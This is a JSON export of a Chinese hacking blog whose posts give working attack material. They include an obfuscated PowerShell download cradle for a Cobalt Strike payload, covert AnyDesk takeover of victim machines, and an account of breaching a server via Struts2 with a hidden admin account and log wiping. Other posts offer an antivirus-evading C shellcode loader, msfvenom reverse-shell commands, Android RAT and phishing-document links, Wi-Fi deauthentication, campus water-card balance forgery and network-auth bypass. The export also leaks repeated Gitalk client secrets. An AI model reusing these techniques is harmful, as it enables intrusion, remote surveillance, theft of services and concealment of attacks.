{"meta":{"title":"魔域魂窟","subtitle":"","description":"网络安全","author":"魂笛","url":"http://bo.vuvhz.top","root":"/"},"pages":[],"posts":[{"title":"工具整理","slug":"工具整理","date":"2022-11-30T02:34:26.000Z","updated":"2022-11-30T02:38:31.322Z","comments":true,"path":"2022/11/30/工具整理/","link":"","permalink":"http://bo.vuvhz.top/2022/11/30/%E5%B7%A5%E5%85%B7%E6%95%B4%E7%90%86/","excerpt":"","text":"#thinkphp漏洞检测工具 写文件测试默认写入根目录名为shell.php内容为的php文件，只是证明有漏洞并没有写入shell。 工具只用来验证漏洞，没有自定义命令/代码执行。 本工具只用来授权检测，未经授权的测试严禁使用本工具。 链接：https://pan.baidu.com/s/1VcfsJHAQCIJLevExNx86mA?pwd=dhc1提取码：dhc1 #Log4j2利用工具。#https://github.com/JaneMandy/Log4j2-Exp核心使用：JNDI-Injection-Exploit开发。 使用#修改Exp.py里面的参数，如Path，设置为JDK8的java的绝对路径。（如果默认java是jdk8不用设置）修改Host,如果是DOCKER,设置为能够回连到Exp为止。建议使用VPS。请确保所有端口被攻击机可以连接。确保利用成功请运行expo和靶场环境均为JDK8。如果JDK版本高于1.8.191等，请被攻击方URLCodebase参数为ture。否则攻击失败。 更新#取消掉了原有的Payload. 大家命令执行时避免命令冲突就行了,主要是直接命令行方式传入参数。如果想设置cs等等上线，建议使用长度较短的payload。 我也给大家提供了攻击环境。#Log4j2RCE为本地测试环境demo.jar为vulfocus靶场的环境，注意都需要使用jdk8运行。 #V2.1_Fofa收集工具 gayhub:https://github.com/naozibuhao/fofatools/releases/tag/V2.1 大威天龙v1.3升级到大罗法咒V2.0 变更说明: 1.更名为大罗法咒V2.0 2.项目化查询,对于同一个查询内容放在同一个tab页 3.添加自定义接口 4.鼠标右击表格内容,增加添加此查询条件 5.取消彩蛋(取消打开gayhub,播放大威天龙背景音乐) 6.还是没有导出功能,要导出的话,表格里面全选复制,然后到excel中粘贴即可 后续会在易用性上继续进行升级 #shiro工具 #自动化钓鱼文档生成工具，自带免杀效果 自动化钓鱼文档生成工具，自带免杀效果 地址：https://github.com/lengjibo/OffenSiveCSharp/tree/master/xlsmfishing 目前仅支持xlsm格式，ＶＴ上大约爆十个左右。 演示视频：https://www.bilibili.com/video/BV15v41187jw 求star、fork#Apache Solr 漏洞检测利用工具v1.1 https://www.secquan.org/Tools/1071842 Apache Solr 漏洞检测利用工具 更新了一下 主要更新： 1、增加了任意文件读取漏洞 2、修改已知bug 本工具仅供学习交流测试，请勿用于任何非法活动，本人不承担一切相关法律责任 #漏洞利用虚拟机 这东西整起来坑太多，直接发大家一份正好的虚拟机版本 我叫雷锋，虚拟机密码ubuntu 链接：https://pan.baidu.com/s/1KuGB6oOwFTZRwZEVGIZ8GA?pwd=4gtn提取码：4gtn #通达OA综合利用工具 关漏洞POC进行整合, 写成图形化工具. 本工具仅供安全测试人员运用于授权测试, 禁止用于未授权测试, 违者责任自负!!! 项目地址#https://github.com/xinyu2428/TDOA_RCE/releases #CVE-2021-21972 Vmware vCenter 图形化POC批量扫描工具 下载地址：#https://github.com/admin360bug/GUI-POC-EXP/# var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"Weblogic图形化利用工具","slug":"Weblogic图形化利用工具","date":"2022-11-30T02:14:02.000Z","updated":"2022-11-30T02:14:55.146Z","comments":true,"path":"2022/11/30/Weblogic图形化利用工具/","link":"","permalink":"http://bo.vuvhz.top/2022/11/30/Weblogic%E5%9B%BE%E5%BD%A2%E5%8C%96%E5%88%A9%E7%94%A8%E5%B7%A5%E5%85%B7/","excerpt":"","text":"#Weblogic图形化利用工具Weblogic图形化利用工具#前几天碰到一个weblogic的站发现有的工具只能执行命令不能写webshell，找到个工具集成了各个利用方法，也可以直接写内存马https://github.com/sp4zcmd/WeblogicExploit-GUI var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"anydesk进行远控","slug":"anydesk进行远控","date":"2022-11-29T04:35:03.000Z","updated":"2022-11-29T04:38:01.521Z","comments":true,"path":"2022/11/29/anydesk进行远控/","link":"","permalink":"http://bo.vuvhz.top/2022/11/29/anydesk%E8%BF%9B%E8%A1%8C%E8%BF%9C%E6%8E%A7/","excerpt":"","text":"#anydesk进行远控在进行内网渗透的时候，如果目标机器出网，但是有时候目标3389端口未开放也就表示我们无法使用远程桌面进行连接。但是依然有很多第三方远程控制软件可以帮助我们，例如Teamviewer或者AnyDesk。 本片文章我们将使用Cobalt Strike配合AnyDesk进行演示。 首先上线cs#这里我们使用powershell上线，首先我们使用Payload Generator生成一个ps1脚本 然后在目标机器上执行：(使用管理员权限执行) 1powershell "$a='IEX(New-Object Net.WebClient).Downlo';$b='11(''https://www.xxxx.tk:8443/payload.ps1'')'.Replace('11','adString');IEX ($a+$b)" 可以看到上线成功 下载anydesk#获取到权限以后 ，我们在目标机器上下载anydesk： 1powershell (New-Object System.Net.WebClient).DownloadFile(“https://download.anydesk.com/AnyDesk.exe","C:\\anydesk.exe") 我们看到anydesk已经下载到了目标主机上，这是我们先不急着打开，我们先添加他的配置文件 #生成配置文件#如果我们直接打开的话，我们不知道他的id号，也不能通过密码进行登录，更不可能直接修改，这时候我们可以先在本机生成一个配置文件，然后将配置文件拷过去。 所以我们先下载一个anydesk到本地，然后打开它，记住他的id号，例如我的就是802691146我们为自主访问设置密码在这里随便设置一个密码 然后我们将anydesk彻底关闭，退出的时候选择不安装anydesk他会自动将配置文件生成在%appdata%\\AnyDesk，也就是C:\\Users\\你的用户名\\AppData\\Roaming\\AnyDesk 我们将这四个文件保存下来，然后上传到目标主机的对应位置，务必记得保存到别处以后把本机的配置文件删除#上传配置文件并启动anydesk#在这个路径下新建一个名为AnyDesk的文件夹 然后在此文件夹下上传刚刚保存的四个配置文件 然后启动anydesk 连接测试，提示输入密码 成功连接 #注意事项#这里说一下避免踩坑的几个点： 记的在这里一定要把用户名称改成自定义，否则在那边直接会显示你的用户名 \\手动狗头 生成配置文件后将配置文件保存后记的删除配置文件，下次你重新启动anydesk的时候会自动生成并自动重新分配一个id目标主机必须有管理员权限必要时可以可以设置代理，避免让对方反制自己(由于我是用的是clash，直接代理的本地7890端口)控制目标机器后可以关闭目标机器的anydesk，但实际不会断开连接，且连接结束后会自动结束目标机器的anydesk进程，便于消除痕迹控制目标机器后记的开启禁止用户输入和启动隐私模式 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"Struts2漏洞","slug":"Struts2漏洞","date":"2022-11-29T04:23:53.000Z","updated":"2022-11-29T04:29:15.245Z","comments":true,"path":"2022/11/29/Struts2漏洞/","link":"","permalink":"http://bo.vuvhz.top/2022/11/29/Struts2%E6%BC%8F%E6%B4%9E/","excerpt":"","text":"#Struts2漏洞实战锁定目标后发现没有注入，也没有xss，也没有远程代码执行于是用检测工具，盲打，打出了Struts2，于是开始漏洞利用1.github上面有Struts2工具，拿到shell，上线冰蝎 2.然后一番周折，我的马直接被它安全管家杀掉，于是又加强了我的马，成功的绕过了安全管家，成功上线 3.查看系统信息 4.运气比较好，直接getsystem 然后建立账号net user hack$ hack /add && net localgroup hack hack$ /add 5.常规操作，想办法获取密码，不知到这是什么情况，于是我懵了，刚刚和安全管家大战2天，今天又碰到了系统问题 密码好像是加密的，哎。我还是太菜了6.然后赶紧删除记录 系统日志：%SystemRoot%\\System32\\Winevt\\Logs\\System.evtx安全日志：%SystemRoot%\\System32\\Winevt\\Logs\\Security.evtx应用程序日志：%SystemRoot%\\System32\\Winevt\\Logs\\Application.evtx日志在注册表的键：HKEY_LOCAL_MACHINE\\system\\CurrentControlSet\\Services\\Eventlog 开始→运行,输入 eventvwr 进入事件查看器，右边栏选择清除日志。 PowerShell -Command “& {Clear-Eventlog -Log Application,System,Security}” Get-WinEvent -ListLog Application,Setup,Security -Force | % {Wevtutil.exe cl $_.Logname} eventcreate -l system -so administrator -t warning -d “this is a test” -id 500 meterpreter > run event_manager -i meterpreter > run event_manager -c meterpreter > clearev 一顿操作猛如虎，一看技术两条狗 7.3389死活打不开，不知是不是安全管家搞的，于是用通道建立隧道，msf打一下内网 打完ms17-010，无果8.第二天在弄，马连接效果还是好，关机了，还能不断 获取到了hash，但是忘记截图了 aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0我尝试用hash登录，也失败了。。国庆节了，我还是没有破解开，太菜了，呜呜，大佬们可以帮我破解一下吗？小弟十分感谢啊 然后获取截图，使用社区大佬发的远程协助工具漏洞通过修改软件运行后的文档内容，二改成固定的协助码的方式，顺利登录服务器 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"wifi杀手终极版oled显示","slug":"wifi杀手终极版oled显示","date":"2022-11-29T03:53:21.000Z","updated":"2022-11-29T03:54:01.209Z","comments":true,"path":"2022/11/29/wifi杀手终极版oled显示/","link":"","permalink":"http://bo.vuvhz.top/2022/11/29/wifi%E6%9D%80%E6%89%8B%E7%BB%88%E6%9E%81%E7%89%88oled%E6%98%BE%E7%A4%BA/","excerpt":"","text":"#wifi杀手终极版oled显示https://github.com/SpacehuhnTech/esp8266_deauther/releases/tag/2.6.1#感谢spacehuhn开源#某宝240，成本26#测试效果秒杀，但是只支持2.4G频段的#制作方法：一个esp8266，一个oled屏幕，按键oled可以买IIC接口的也可以买SPI接口，SPI接口速度更快因为便宜，所以我选择IIC的 1.固件 https://github.com/SpacehuhnTech/esp8266_deauther/releases/download/2.6.1/esp8266_deauther_2.6.1_DSTIKE_DEAUTHER_OLED_V1_5.bin 2.攻击方式分为： （1）Deauth：因为WIFI管理数据帧没有被加密，导致攻击者可以伪造管理帧，从而让攻击者可以任意发送“取消认证”数据包来强行切断AP与客户端的连接（就是无脑洪水堵塞攻击，一直切断对方设备与机器的连接，从而导致对方设备无法正常连接）。 （2）Beacon：信标帧(Beacon)数据包用于宣告接入点，通过不断发送信标帧数据包（说白点就是创建许多新的wifi干扰对方的正常连接），由于目前部分设备自带SSID检测，所以我们使用随机生成SSID以达到目的。 （3）Probe-response：探测请求帧由用户设备发送，以询问一个已知网络是否在附近。通过请求您在SSID列表中指定的网络，以此来混淆WiFi跟踪器。（就是手机给已知WiFi网络发送一个probe-request帧，可提供网络服务的接入点将响应一个probe-response帧，你的手机将会跟这个响应接入点进行连接，所以看起来跟Deauth攻击差不多）。 （4）钓鱼攻击：通过伪造wifi使受害者连接假冒wifi，通过钓鱼页面等一系列手法可以实现监听流量，获取原真实wifi密码等等，在这里不多赘述和展示了。 漏洞产生原因：802.11 WiFi标准包含一种专门针对网络和连接管理的特殊帧类型，查找wifi时，被动监听WiFi热点所广播出来的“beacon”管理帧(用来表明该热点可用)，而“probe-request”，你的设备会发送这种管理帧来查看之前连接过的网络当前是否在周围。如果距离内存在已访问过的网络，相应的热点将会用“probe-response”帧予以响应，这些管理帧存在的问题就是，它们完全没有经过任何的加密，这样做的目的是为了增加WiFi的易用性，因为你完全不需要进行任何的密钥交换或密码确认就可以查看到周围的WiFi网络以及热点名称，但这也增加了WiFi网络的攻击面：任何设备都可以给任何网络发送beacon帧和probe-response帧。 防御措施： 1.将进行wifi攻击的抓到打一顿，一顿不行就继续打（开个玩笑）。 2.将路由器设置发射信道使用5Ghz频段。 3.使用网线连接（手动滑稽）。 4.购买有安全防护功能的大牌路由器。 5.目前还没有什么其他更好的措施，等待新协议标准的出现。 实测 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"c语言免杀加载器","slug":"c语言免杀加载器","date":"2022-11-29T03:45:07.000Z","updated":"2022-11-29T03:52:03.609Z","comments":true,"path":"2022/11/29/c语言免杀加载器/","link":"","permalink":"http://bo.vuvhz.top/2022/11/29/c%E8%AF%AD%E8%A8%80%E5%85%8D%E6%9D%80%E5%8A%A0%E8%BD%BD%E5%99%A8/","excerpt":"","text":"#c语言免杀加载器分享一款加载器分离木马payloads测试效果 生产payloads，二进制的payloads 运行上线 测试代码可以用vs2012~vs2022，需要修改部分代码，vs2019好像不用，我是vs2019 12345678910111213141516171819202122232425262728293031323334353637383940414243444546#include "stdafx.h"#include <windows.h>#include <stdlib.h>#include <stdio.h>#include <urlmon.h>#include <string>#include <time.h>using namespace std;#pragma comment(linker,"/subsystem:\\"windows\\" /entry:\\"mainCRTStartup\\"")#include <UrlMon.h>#pragma comment(lib,"urlmon.lib")#include <tchar.h>int main(){ Sleep(182); URLDownloadToFile(NULL, _T("http://www.xxxxxx.com/shell.png"), _T("miko.png"), NULL, NULL); Sleep(168); int a; srand((unsigned)time(NULL)); a=rand()%10000+1; FILE *lp; size_t help; unsigned char* shell; Sleep(a); for(int i=0;i<3;i++){a=rand()%10000+1; Sleep(a);} lp=fopen("shell.png","rb"); Sleep(a); fseek(lp,0,SEEK_END); help=ftell(lp); fseek(lp,0,SEEK_SET); shell=(unsigned char*)malloc(help); Sleep(200); fread(shell,help,1,lp); void* exec=VirtualAlloc(0,help,MEM_COMMIT,PAGE_EXECUTE_READWRITE); memcpy(exec,shell,help); ((void(*) ())exec)(); return 0;} 前面的代码生成二进制的图片png，然后把图片放到服务器http://xxxxxx.top/miko.png，然后运行木马，木马会把payload下载到电脑然后执行，二是把图片传到本文件夹在运行这个exe加载器实现加载payload，在没有网的时候把图片放到这个里面，在有网的时候可以让他自己下载然后执行。 #方式二1.msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.1681.102 -e x86/shikata_ga_nai -i 11 -f py -o mo.py 2.msfvenom -p windows/meterpreter/reverse_tcp LHOST=vuvhz.top LPORT=8888 -e x86/shikata_ga_nai -i 11 –platform windows PrependMigrate=true PrependMigrateProc=svchost.exe -f py -o mo.py自动迁移进程到svchost.exe 3.msfvenom -p windows/meterpreter/reverse_tcp LHOST=vuvhz.top LPORT=443 -e x86/shikata_ga_nai -i 11 –platform windows PrependMigrate=true PrependMigrateProc=svchost.exe PayloadUUIDTracking=true HandlerSSLCert=/home/kali/Desktop/bd/www.baidu.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f py -o mo.py证书加自动迁移进程到svchost.exe #手机远控无后门版 资源分享 · mikoxihua · 于3年前创建 · 共 281 次阅读https://pan.baidu.com/s/1YeriXnaVpPp90AQJAr9QsA 8m3g 实测可持久，可开机自启，可隐藏#封装windows系统#对于一些需要多次装机的系统进行iso封装，可以减少不必要的麻烦，封装系统环境加所有工具，安装即用#之前用于封装系统，网上找了好多没弄理想，于是在淘宝买了这工具链接：https://pan.baidu.com/s/1IuHJnQPUhM6ZJIx3-ONjVg提取码：secq复制这段内容后打开百度网盘手机App，操作更方便哦 #445检测批量工具下载链接https://pan.baidu.com/s/1-Vgxa13ebY4AyHWyL0nj1gsecq 打开ms17-010批量扫描.bat 更改要扫描的ip段，格式为111.111.%n%.1/24 运行完成后。进入bug文件夹，打开合并bug.bat 然后打开bug.txt ctrl+F搜索“成功”。感谢大佬们发的检测工具 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"校园热水卡破解.md","slug":"校园热水卡破解","date":"2022-11-28T00:45:23.000Z","updated":"2022-11-28T00:46:37.253Z","comments":true,"path":"2022/11/28/校园热水卡破解/","link":"","permalink":"http://bo.vuvhz.top/2022/11/28/%E6%A0%A1%E5%9B%AD%E7%83%AD%E6%B0%B4%E5%8D%A1%E7%A0%B4%E8%A7%A3/","excerpt":"","text":"#校园热水卡破解(授权)本测试已经授权#1.需要的工具和设备都不用说了，某宝上可以买到正题#2.测试思路—->查看水卡信息—->找出金额的位置——>然后猜测计算算法—–>写入金额——->白嫖（当然不要违法，校方已经开始想方案了）3.这是没钱时的水卡的信息 4.这是有钱时候的水卡 5.打码的地方是学号和姓名6.发现了刷水前后的变化区域在1扇区，于是开始拿笔计算，没有接触过的我，就查了一下资料，（百度），于是按照大佬的操作测试————————>运气不好，失败告终，无法使用，水卡一直报警参照这个大佬的文章，不行https://www.52pojie.cn/thread-799755-1-1.html7.从以上文章中得出 1234567891011修改数据（每个学校水卡算法不同，此算法不一定适用你的水卡）现在将金额改成333块钱保留两位小数就是333.00去掉点33300转十六进制得8214，然后倒过来得1482然后搞定校验位1482按位取反得0B7D然后替换原金额F460替换成1482原校验位0B9F替换成0B7D (1)校验位 (2)金额 就这俩，于是拿起笔开始看，果不其然，发现我们的水卡是6个十六进制 404B4C 猜测元，角，分 于是开始计算 然后倒写，然后在求校验位，于是按位取反得00BFB4B3，刚开始写入一行，因为水卡一开始两行的数据不一样，于是我写进去后只写了一行，后来一直响，刷水还无限，于是以为金额问题，就在改，可以还是无果，于是不是金额的问题，于是尝试写两行，看到之前那篇文章的大佬也写了两行，于是写了两行后 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"安卓远控.md","slug":"安卓远控","date":"2022-11-27T08:58:34.000Z","updated":"2022-11-27T09:02:27.272Z","comments":true,"path":"2022/11/27/安卓远控/","link":"","permalink":"http://bo.vuvhz.top/2022/11/27/%E5%AE%89%E5%8D%93%E8%BF%9C%E6%8E%A7/","excerpt":"","text":"#安卓远控 spynote3.2###安卓远控 spynote3.2 简明使用教程在 freebuf看到 ‘当心，安卓远控（spynote）升级了’#遂下来自己琢磨了下 的确是非常强大 隐藏自身 目前还是过查杀的 希望大家都多多动手 然后发心得到社区中来 多多发表自己的学习心得 技术理解等让我们共同建设好 这片属于我们自己的圈子 效果图# 至少要win7以上 必须安装 .net4.5 4.5以下都不可以 java推荐是 jre 8 .net 安装不对的话 会提示 各种错误一些文件夹不存在 java版本低的话会有各种java 的意外停止 2 配置相关# 顺利打开的话 会提示 设置端口 配置木马#点击左上角 tools – bulid 然后 配置上线地址 端口 等 换个图标试试？ 上线效果#上线速度很快 功能很强大 链接：https://pan.baidu.com/s/10kGm5xldOv4u-q7KMw4Vew提取码：1111 还有poc整理https://github.com/Phuong39/2022-HW-POC var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"校园网udp53端口破解免认证","slug":"校园网udp53端口破解免认证","date":"2021-10-12T11:02:27.000Z","updated":"2021-10-12T11:08:41.290Z","comments":true,"path":"2021/10/12/校园网udp53端口破解免认证/","link":"","permalink":"http://bo.vuvhz.top/2021/10/12/%E6%A0%A1%E5%9B%AD%E7%BD%91udp53%E7%AB%AF%E5%8F%A3%E7%A0%B4%E8%A7%A3%E5%85%8D%E8%AE%A4%E8%AF%81/","excerpt":"","text":"#校园网udp53端口破解免认证 安装脚本http://iyandi.xyz/wp-content/uploads/2021/10/openvpn-install-master.zip openvpn下载 http://iyandi.xyz/wp-content/uploads/2021/10/win10-2.4.9.zip 自行翻墙下载，或者使用我的###原理：此方法基本全国百分之80校园网可破解，让大家了解下校园网。本教程适用于校园网以及运营商的CMCC,chinanet,unicom。（任何需要web认证的WiFi）目前校园网破解方案： 利用udp 53/67/68/69/161/5353/6868/636/3389/123/1194 端口上网 IPv4免流上网 drcom共享网络 不排除有其他高阶方案，只列出我所了解的，比如刷路由器固件等等 原理简介 在连接到某个需要Web认证的热点后（已连接但未验证），我们已经获得了一个内网IP，此时如果我们访问某个HTTP网站，网关会对这个HTTP响应报文劫持并纂改，302重定向给我们一个web认证界面。 网关（或者说交换机）都默认放行DHCP（用于分配IP）和DNS（用于劫持用户数据报）。比如DNS用到的端口是udp53,DHCP用到的端口是udp67，68，67是服务器广播回应端口用户报文应该过不去。 破解方法： 在校外服务器搭建代理（op，dns2等），代理协议udp,代理端口 53/67/68/69/161/5353/6868/636/3389/123/1194等等端口 ###正题1.openvpn服务端安装 bash openvpn-install.sh 2.设置ip 3.名字随便写 如上图配置完成 4.名字随便 5.添加用户名 6.复制配置文件到openvpn客户端连接，一定要关闭防火墙，打开53端口 成功突破校园网，不用在办理非常非常贵的宽带了，太黑了，有些学校是其他端口，搭建服务器该端口就可以了 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"MFC社工利器","slug":"MFC社工利器","date":"2021-09-17T13:50:32.000Z","updated":"2021-09-17T13:51:12.701Z","comments":true,"path":"2021/09/17/MFC社工利器/","link":"","permalink":"http://bo.vuvhz.top/2021/09/17/MFC%E7%A4%BE%E5%B7%A5%E5%88%A9%E5%99%A8/","excerpt":"","text":"MFC社工利器就他了，第一个，qq右上角复制qq看点链接# 然后打开我的软件 qq看点到手机号，微博一条龙 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"esp8266+blinker+小爱同学控制4到8个设备源码","slug":"esp8266+blinker的app+小爱同学控制4到8个设备源码","date":"2021-09-17T13:48:28.000Z","updated":"2021-09-17T13:48:29.257Z","comments":true,"path":"2021/09/17/esp8266+blinker的app+小爱同学控制4到8个设备源码/","link":"","permalink":"http://bo.vuvhz.top/2021/09/17/esp8266+blinker%E7%9A%84app+%E5%B0%8F%E7%88%B1%E5%90%8C%E5%AD%A6%E6%8E%A7%E5%88%B64%E5%88%B08%E4%B8%AA%E8%AE%BE%E5%A4%87%E6%BA%90%E7%A0%81/","excerpt":"","text":"esp8266+blinker的app+小爱同学控制4到8个设备源码 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295#define BLINKER_MIOT_MULTI_OUTLET //设置为小爱多个插座的模式#define BLINKER_PRINT Serial#define BLINKER_PRINT Serial#define BLINKER_WIFI#include <Blinker.h>#define Socket1 D5#define Socket2 D6#define Socket3 D7#define Socket4 D8char auth[] = "***************";/****秘钥****/char ssid[] = "****************"; //wifi名字char pswd[] = "************"; // wifi密码char Port;int Feedback = 0;int OnorOff = 0;long F_time = 0;int count=0;bool WIFI_Status = true;// 新建组件对象BlinkerButton Button1("k1"); //设置blinkerapp内数据键名BlinkerButton Button2("k2");BlinkerButton Button3("k3");BlinkerButton Button4("k4");void smartConfig()//配网函数{ WiFi.mode(WIFI_STA); Serial.println("\\r\\nWait for Smartconfig..."); WiFi.beginSmartConfig();//等待手机端发出的用户名与密码 while (1) { Serial.print("."); digitalWrite(LED_BUILTIN, HIGH); delay(1000); digitalWrite(LED_BUILTIN, LOW); delay(1000); if (WiFi.smartConfigDone())//退出等待 { Serial.println("SmartConfig Success"); Serial.printf("SSID:%s\\r\\n", WiFi.SSID().c_str()); Serial.printf("PSW:%s\\r\\n", WiFi.psk().c_str()); break; } }}void WIFI_Set()//{ //Serial.println("\\r\\n正在连接"); while(WiFi.status()!=WL_CONNECTED) { if(WIFI_Status) { Serial.print("."); digitalWrite(LED_BUILTIN, HIGH); delay(500); digitalWrite(LED_BUILTIN, LOW); delay(500); count++; if(count>=5)//5s { WIFI_Status = false; Serial.println("WiFi连接失败，请用手机进行配网"); } } else { smartConfig(); //微信智能配网 } } /* Serial.println("连接成功"); Serial.print("IP:"); Serial.println(WiFi.localIP());*/}void Set_Butt(int num) //on反馈{ if (num == 1) { Button1.print("on"); } else if (num == 2) { Button2.print("on"); } else if (num == 3) { Button3.print("on"); } else if (num == 4) { Button4.print("on"); } }void Reset_Butt(int num) //off反馈{ if (num == 1) { Button1.print("off"); } else if (num == 2) { Button2.print("off"); } else if (num == 3) { Button3.print("off"); } else if (num == 4) { Button4.print("off"); } }void miotPowerState(const String & state, uint8_t num) //小爱控制函数{ BLINKER_LOG("need set outlet: ", num, ", power state: ", state); if (num == 1) { Feedback = 1; Port = Socket1; //指定每一路开关对应在开发板上的通道接口 } else if (num == 2) { Feedback = 2; Port = Socket2; } else if (num == 3) { Feedback = 3; Port = Socket3; } else if (num == 4) { Feedback = 4; Port = Socket4; } if (state == BLINKER_CMD_ON) { OnorOff = 1; if(num == 0) { Feedback = 5; digitalWrite(Socket1, HIGH); digitalWrite(Socket2, HIGH); digitalWrite(Socket3, HIGH); digitalWrite(Socket4, HIGH); } else { digitalWrite(Port, HIGH); } BlinkerMIOT.powerState("on", num); BlinkerMIOT.print(); } else if (state == BLINKER_CMD_OFF) { OnorOff = 2; if(num == 0) { Feedback = 5; digitalWrite(Socket1, LOW); digitalWrite(Socket2, LOW); digitalWrite(Socket3, LOW); digitalWrite(Socket4, LOW); } else { digitalWrite(Port, LOW); } BlinkerMIOT.powerState("off", num); BlinkerMIOT.print(); }}void button1_callback(const String & state) //点灯app内控制按键触发{ BLINKER_LOG("get button state: ", state); if (state == "on") { digitalWrite(Socket1, HIGH); Button1.print("on"); } if (state == "off") { digitalWrite(Socket1, LOW); Button1.print("off"); }}void button2_callback(const String & state) //点灯app内控制按键触发{ BLINKER_LOG("get button state: ", state); if (state == "on") { digitalWrite(Socket2, HIGH); Button2.print("on"); } if (state == "off") { digitalWrite(Socket2, LOW); Button2.print("off"); }}void button3_callback(const String & state) //点灯app内控制按键触发{ BLINKER_LOG("get button state: ", state); if (state == "on") { digitalWrite(Socket3, HIGH); Button3.print("on"); } if (state == "off") { digitalWrite(Socket3, LOW); Button3.print("off"); }}void button4_callback(const String & state) //点灯app内控制按键触发{ BLINKER_LOG("get button state: ", state); if (state == "on") { digitalWrite(Socket4, HIGH); Button4.print("on"); } if (state == "off") { digitalWrite(Socket4, LOW); Button4.print("off"); }}void setup() { // 初始化串口 Serial.begin(115200);#if defined(BLINKER_PRINT) BLINKER_DEBUG.stream(BLINKER_PRINT);#endif // 初始化有LED的IO pinMode(Socket1, OUTPUT); digitalWrite(Socket1, LOW); pinMode(Socket2, OUTPUT); digitalWrite(Socket2, LOW); pinMode(Socket3, OUTPUT); digitalWrite(Socket3, LOW); pinMode(Socket4, OUTPUT); digitalWrite(Socket4, LOW);//初始化输出低电平 pinMode(LED_BUILTIN, OUTPUT); WIFI_Set(); // 初始化blinker Blinker.begin(auth, WiFi.SSID().c_str(), WiFi.psk().c_str()); Button1.attach(button1_callback);//注册按键回调函数 Button2.attach(button2_callback); Button3.attach(button3_callback); Button4.attach(button4_callback); BlinkerMIOT.attachPowerState(miotPowerState); // BlinkerMIOT.attachPowerState(miotPowerState); digitalWrite(LED_BUILTIN, HIGH);}int i=0;void loop() { Blinker.run(); if(OnorOff == 0) { } else if(OnorOff == 1)//如果是ON状态 { delay(1500); if(Feedback < 5)//小于5 是单独控制 1-4 { Set_Butt(Feedback);//反馈1-4 OnorOff = 0; }else if(Feedback == 5)//等于5 是打开所有然后1.2s每个的速度反馈所有 { if(millis() - F_time >=1200) { F_time = millis(); i++; Set_Butt(i); 